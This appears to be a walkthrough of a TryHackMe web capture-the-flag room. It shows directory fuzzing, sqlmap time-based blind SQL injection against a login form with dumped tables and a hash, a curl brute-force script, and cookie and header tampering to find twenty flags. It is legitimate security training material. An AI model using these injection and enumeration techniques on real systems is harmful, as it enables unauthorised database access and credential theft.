THM-CTF collection Vol.2-Writeup
Sharpening up your CTF skill with the collection. The second volume is about web-based CTF.
Find This Room: CTF collection Vol.2
Intial Enum
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ ffuf -u http://10.10.118.177/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -t 35 -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://10.10.118.177/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 35
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
.hta [Status: 403, Size: 285, Words: 21, Lines: 11]
.hta.php [Status: 403, Size: 289, Words: 21, Lines: 11]
.hta.html [Status: 403, Size: 290, Words: 21, Lines: 11]
.htaccess.html [Status: 403, Size: 295, Words: 21, Lines: 11]
.hta.txt [Status: 403, Size: 289, Words: 21, Lines: 11]
.htaccess [Status: 403, Size: 290, Words: 21, Lines: 11]
.htaccess.txt [Status: 403, Size: 294, Words: 21, Lines: 11]
.htpasswd.php [Status: 403, Size: 294, Words: 21, Lines: 11]
.htpasswd.html [Status: 403, Size: 295, Words: 21, Lines: 11]
.htpasswd.txt [Status: 403, Size: 294, Words: 21, Lines: 11]
.htpasswd [Status: 403, Size: 290, Words: 21, Lines: 11]
.htaccess.php [Status: 403, Size: 294, Words: 21, Lines: 11]
button [Status: 200, Size: 37980, Words: 268, Lines: 228]
cat [Status: 200, Size: 60065, Words: 522, Lines: 350]
cgi-bin/ [Status: 403, Size: 289, Words: 21, Lines: 11]
cgi-bin/.html [Status: 403, Size: 294, Words: 21, Lines: 11]
index [Status: 200, Size: 94328, Words: 356, Lines: 86]
index.php [Status: 200, Size: 94328, Words: 356, Lines: 86]
index.php [Status: 200, Size: 94328, Words: 356, Lines: 86]
iphone [Status: 200, Size: 19286, Words: 56, Lines: 218]
login [Status: 301, Size: 314, Words: 20, Lines: 10]
robots [Status: 200, Size: 430, Words: 46, Lines: 6]
robots.txt [Status: 200, Size: 430, Words: 46, Lines: 6]
robots.txt [Status: 200, Size: 430, Words: 46, Lines: 6]
server-status [Status: 403, Size: 294, Words: 21, Lines: 11]Easter 1
Easter 2
We went back to the file robots.txt encore, where we see an encoded URL.
Click View Page Source :
<html>
<head>
<title> A slow clap for you</title>
<h1 style="text-align:center;">A slow clap for you</h1>
</head>
<body>
<p style="text-align:center;"><img src="kim.png"/></p>
<p style="text-align:center;">Not bad, not bad.... papa give you a clap</p>
<p style="text-align:center;color:white;">Easter 2: THM{REACTED}</p>
</body>
</html>Easter 3
We Have A login Page Lets Open :
login [Status: 301, Size: 314, Words: 20, Lines: 10]
Easter 4
In this flag we will intercept our data from the POST method, saved it as a text file, I called it r.txt and then you take that data and use it with SQLmap to perform a SQL POST injection.
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ sqlmap -r r.txt --dbs --batch
___
__H__
___ ___["]_____ ___ ___ {1.8.7#pip}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:44:44 /2024-11-23/
[00:44:44] [INFO] parsing HTTP request from 'r.txt'
[00:44:44] [INFO] resuming back-end DBMS 'mysql'
[00:44:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 8089 FROM (SELECT(SLEEP(5)))khRt) AND 'nfnb'='nfnb&password=admin&submit=submit
---
[00:44:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Quantal Quetzal or Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[00:44:47] [INFO] fetching database names
[00:44:47] [INFO] fetching number of databases
[00:44:47] [INFO] resumed: 4
[00:44:47] [INFO] resumed: information_schema
[00:44:47] [INFO] resuming partial value: THM_f0und_m
[00:44:47] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[00:45:21] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[00:45:22] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[00:45:35] [INFO] retrieved:
[00:45:54] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[00:45:54] [INFO] retrieved:
available databases [2]:
[*] information_schema
[*] THM_f0und_m3whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ sqlmap -r r.txt -D THM_f0und_m3 --tables --batch
Database: THM_f0und_m3
[2 tables]
+----------------+
| user |
| nothing_inside |
+----------------+whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ sqlmap -r r.txt -D THM_f0und_m3 -T nothing_inside --columns --batch
Database: THM_f0und_m3
Table: nothing_inside
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| Easter_4 | varchar(30) |
+----------+-------------+whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ sqlmap -r r.txt -D THM_f0und_m3 -T nothing_inside -C Easter_4 --dump --batch
Database: THM_f0und_m3
Table: nothing_inside
[1 entry]
+-------------------------+
| Easter_4 |
+-------------------------+
| THM{Snip} |
+-------------------------+Easter 5
For flag number 5, we continue digging in the database for credentials, two usernames are available, and only one contain an md5 hash.
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ sqlmap -r r.txt -D THM_f0und_m3 -T user --columns --batch
Database: THM_f0und_m3
Table: user
[2 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(40) |
| username | varchar(30) |
+----------+-------------Now we have the password, but in the form of a hash , If you have sqlmap running automatically, it will decrypt
Database: THM_f0und_m3
Table: user
[2 entries]
+------------------------------------------+
| password |
+------------------------------------------+
| 05f3672(Snip)d00070d1b |
| He is a nice guy, say hello for me |
+------------------------------------------+
Easter 6
For flag number 6, there’s a hint giving with the question telling us to check for the main page header. After checking the headers requests, we owned the flag.
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ curl -I http://10.10.118.177/
HTTP/1.1 200 OK
Date: Fri, 22 Nov 2024 23:38:59 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.26
Busted: Hey, you found me, take this Easter 6: THM{Snip}
Set-Cookie: Invited=0
Vary: Accept-Encoding
Content-Type: text/htmlEaster 7
In this challenge we have to use the “Invited cookie” with burpsuite, we pass it a number that we have to guess or brute-force but obviously it’s A one, and it’s the right invite cookie and you’ll get the sixth flag
Easter 8
For flag number 8, The front page source code says that you have to be an iphone to access the content, all you have to do is to modify the User Agent for your request from the original one to an iphone one, and you get the flag.
Easter 9
When we visit the /ready page and use burp to take control of each request, we check the source code of the page we get the flag number 09.
Booom!
Easter 10
In Flag number 10, you will need to send a GET request with a referrer as ‘tryhackme.com’ to get back the flag from the page.
Easter 11
In the options on the main page, we see four choices, but we see that “Deskel” prefers egg. We send egg instead of the salad we make DesKel happy and we get the Flag number 11.
Easter 12
don’t worry there’s always hints in the questions, no need to stress on reading, doing is much easier … anyway, there’s a javascript code in the page go check it, they’ll be a function there containing our flag
Easter 13
Flag number 13 is related to Flag 9, fallow the lead from 9 to 13, same dynamic, source code…
Easter 14
For flag 14, it’s straight forward, the main page source code contain the flag as a png encoded to base64, decode it, and get the flag from the picture.
Click Here cyberchef and Paste The code we found
Easter 15
For this Flag, we will play some guessing games, don’t get emotional about it, but you are going to lose some brain cells.
Each alphabet is a special hash number, guess the alphabet of each number of the hint, You’ll get the flag.
Option 1: Manual Enumeration
This approach requires us to manually enter all 26 letters of the alphabet into the text box and correlate them with the respective values we receive in return. Not too painful and certainly doable.
Once we have built a table with the mappings, we can decode the numbers we were given earlier by the task (hints: 51 89 77 93 126 14 93 10).
Option 2: Automate with Linux-fu
While this method may initially seem slower than manual input, requiring time to craft an HTTP POST request and develop a bash script for automation, it offers scalability and reusability for future CTF challenges with minimal adjustments. It’s the Maverick way!
We first need to capture a request using Burp, then save it and convert it to a curl command. The next step is to cycle through the letters (A-Z) using a for loop and passing them to “answer=”.
Of course, you need to edit the hostname/URL of the target server.
#!/bin/bash
for letter in {A..Z} {a..z}; do
response=$(curl -X POST -H "Host: ctfvol2.thm" -H "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" -H "Accept-Encoding: gzip, deflate" -H "Content-Type: application/x-www-form-urlencoded" -H "Origin: http://ctfvol2.thm" -H "Referer: http://ctfvol2.thm/game1/" -H "Cookie: Invited=0" -H "Upgrade-Insecure-Requests: 1" --data "answer=$letter" --compressed --silent http://ctfvol2.thm/game1/)
hash=$(echo "$response" | grep -oP '<p>Your hash:\s+\K\d+')
echo "$letter : $hash"
doneSave the bash script as answer.sh and make the file executable:
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2$ chmod +x answer.shRun the script and sit back:
whoami@mint:~/Desktop/THM-Lab/CTFCollectionVol.2.$./answer.sh
A : 99
B : 100
C : 101
D : 102
E : 103
F : 104
G : 51
H : 52
I : 53
J : 54
K : 55
L : 56
M : 57
N : 58
O : 126
P : 127
Q : 128
R : 129
S : 130
T : 131
U : 136
V : 137
W : 138
X : 139
Y : 140
Z : 141
a : 89
b : 90
c : 91
d : 92
e : 93
f : 94
g : 95
h : 41
i : 42
j : 43
k : 75
l : 76
m : 77
n : 78
o : 79
p : 80
q : 81
r : 10
s : 11
t : 12
u : 13
v : 14
w : 15
x : 16
y : 17
z : 18We now have the correct mappings and we finally can start decoding the numbers provided to us by the task.
51 : G
89 : a
77 : m
93 : e
126 : O
14 : v
93 : e
10 : r
Easter 16
Flag number 16 is very very easy, all you have to do is to click the three buttons on the browser all three at once, and you’ll get the flag number 16.
Let’s examine a typical request by pressing one of the buttons and intercepting the request using Burp.
Easter 17
On the main website, either in Burp or your browser’s “Inspector”, review the source code of the webpage. You’ll find a binary-encoded message embedded in the function catz()
The hint suggests we need to perform the following operations to decode it: Binary → Decimal → Hex → ASCII code
We have several options
- dCode.fr Cipher Indentifier does it in one fell swoop:
or use This Script :
# Define the binary string
b = '100010101100001011100110111010001100101011100100010000000110001001101110011101000100000010101000100100001001101011110110110101000110101010111110110101000110101010111110110101100110011011100000101111101100100001100110110001100110000011001000011001101111101'
# Convert binary to decimal
d = int(b, 2)
print(d) # Print the decimal representation
# Convert decimal to hexadecimal
h = hex(d)[2:]
print(h) # Print the hexadecimal representation
# Convert hexadecimal to ASCII
ascii_text = bytes.fromhex(h).decode('ASCII')
# Print the ASCII representation
print(ascii_text) 
Easter 18
This task seems to be straightforward. We need to send an additional parameter called “Egg” with the value “Yes” in the request header and hopefully, we will be rewarded with a flag.
Easter 19
The hint on this one did not make a lot of sense at first until I found the said “thick dark line” under the text “DID YOU KNOW: All swans in England belong to the queen.”
Inspecting the page in the browser shows that there is a PNG image which has been set with a height of 2 pixels, resulting in a thin, barely visible line. Since the width is set to 2000 pixels, the image will be stretched horizontally, making it appear as a long, thin line across the width of 2000 pixels.
<img height="2" width="2000" src="small.png"/>Changing the value from “2” to “200” should make this look slightly bigger and more visible.
Easter 20
For the last Easter Egg, we remember having seen a hint in the source code of the main page while working on other tasks. Search for “easter 20”.
Simply adding the data “username=DesKel&password=heIsDumb” to the Burp Request body and changing the method from GET to POST would not work.
We are missing a key piece; the addition of the Content-Type: application/x-www-form-urlencoded header parameter is essential because it informs the server about the format of the data being sent in the HTTP request body. In this case, the data is in the format of URL-encoded form data.
When you send data in a POST request, the server needs to know how to interpret that data. The Content-Type header specifies the media type of the request body, allowing the server to parse it correctly.
This is what our Burp Request looks like now:
Follow Me On Linkedin
